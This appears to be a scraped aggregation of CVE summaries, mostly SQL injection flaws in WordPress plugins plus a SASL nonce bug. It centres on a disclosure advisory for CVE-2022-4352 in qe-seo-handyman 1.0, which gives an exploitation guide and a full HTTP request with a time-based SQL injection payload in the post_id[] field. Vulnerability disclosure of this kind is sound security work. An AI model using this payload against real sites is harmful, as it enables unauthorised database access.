The LetsRecover WordPress plugin through 1.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

CVE-2022-4356

CVE-2022-4355

The Qe SEO Handyman WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

**qe-seo-handyman 1.0 (2/2) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 08 2022

Affected Software

qe-seo-handyman

Affected Software Type

WordPress plugin

Version

1.0

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4352

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/qe-seo-handyman

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4352

**Vulnerability Description**

The import_meta action in qe-seo-handyman 1.0 is vulnerable to SQL injection. An authenticated attacker may abuse the CSV file upload functionality to craft a malicious POST request.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

The plugin requires all-in-one-seo-pack to be activated.

Head to Qe SEO handy-man.

Click on the link at Step 3 to import a CSV file:

Click on Browse... and select a valid CSV file.

A sample CSV file may look like the following:

    post_id,url,post_title,wpseo_title,wpseo_metadesc,type,term_taxonomy_id
    5,http://localhost/?taxonomy=bp-email-type&term=activity-at-message,activity-at-message,test,test,bp-email-type,5
    

Then, click Submit:

After uploading, hit Continue.

Clicking the previous button triggers the vulnerable request. The post_id[] array is the vulnerable parameter:

A request may look like the following:

In the code, the vulnerable $post_id variable is written at line 90 in ./inc/QE-Seo-handyman-import-csv.php.

The final database query is executed at line 128 of the same file.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    POST /wp-admin/admin-post.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wp-admin/admin.php?page=qe-seo-handyman&tab=import
    Content-Type: multipart/form-data; boundary=---------------------------8468852133354988763032646215
    Content-Length: 1377
    Origin: http://localhost
    Connection: close
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1666354651%7C5hcpdLYnfCYlULiNoxvsLbX15Xk3355i128JO4Rpaec%7C9052465964755f7df388ca7ded12dea9ba2a5fbb3515169d1c4e2f2792cafad2; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1666351832%7C%7C1666348232%7C%7Cc2cb50590cfa7e94229c1621767b0523; wp-settings-1=editor%3Dtinymce%26ampamphidetb%3D1%26ampampmfold%3Do%26mfold%3Do; wp-settings-time-1=1666181852; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AxIFtmbzi40NKIXvwVmH3Vwly; woocommerce_items_in_cart=1; woocommerce_cart_hash=0ed611221b3d80f0fa539cbbda99650c; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1666354651%7C5hcpdLYnfCYlULiNoxvsLbX15Xk3355i128JO4Rpaec%7Cc6b068ebe7c94a69ba9c603924cf21ddd8463427f2fea34e380736f338a7a6d5
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="action"
    
    import_meta
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="nonce"
    
    62bfc7851f
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_title[]"
    
    test
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_desc[]"
    
    test
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="term_id[]"
    
    5
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="permalink[]"
    
    http://localhost/?taxonomy=bp-email-type&term=activity-at-message
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="taxonomy[]"
    
    bp-email-type
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_focuskw[]"
    
    activity-at-message
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="post_id[]"
    
    5 AND (SELECT 3477 FROM (SELECT(SLEEP(5)))DhVP)
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="submit"
    
    Submit
    -----------------------------8468852133354988763032646215--

CVE-2022-4352: Security Bulletin

CVE-2022-4351

The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

CVE-2022-4049

The Joy Of Text Lite WordPress plugin before 2.3.1 does not properly sanitise and escape some parameters before using them in SQL statements accessible to unauthenticated users, leading to unauthenticated SQL injection

CVE-2022-4099

The Build App Online WordPress plugin before 1.0.19 does not properly sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

CVE-2022-3241

The Visual Email Designer for WooCommerce WordPress plugin before 1.7.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author.

CVE-2022-3860

An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end that does not validate the length of the nonce) could lead to insufficient randomness being used during authentication.

******CVE-2022-48195**

Affected components:

*   mellium.im/sasl

Affected versions:

*   v0.3.0

Fixed in:

v0.3.1

Assigned CVE:

CVE-2022-48195

If the remote end of a SCRAM based SASL authentication attempt advertises support for channel binding an empty nonce is used. This results in authentication failing on servers that verify the nonce length, but when paired with a server that does not properly verify the length it could result in insufficient randomness being used during authentication.

No known exploits or exploit chains take advantage of this issue.

CVE-2022-48195: Mellium — CVE-2022-48195

Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]

Tag

#perl